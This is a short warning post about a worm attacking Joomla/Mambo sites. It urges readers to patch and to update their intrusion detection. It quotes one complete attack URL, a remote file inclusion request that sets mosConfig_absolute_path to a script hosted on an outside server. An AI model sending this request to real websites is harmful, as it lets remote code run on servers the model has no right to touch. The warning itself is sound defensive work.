Some worm is doing the rounds. Requests look like this:
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ebbw.net/components/com_magazine/layouts/id.txt?
The payload only checks for the user id, but can easily be changed of course.
Update your stuffs and update your tripwires.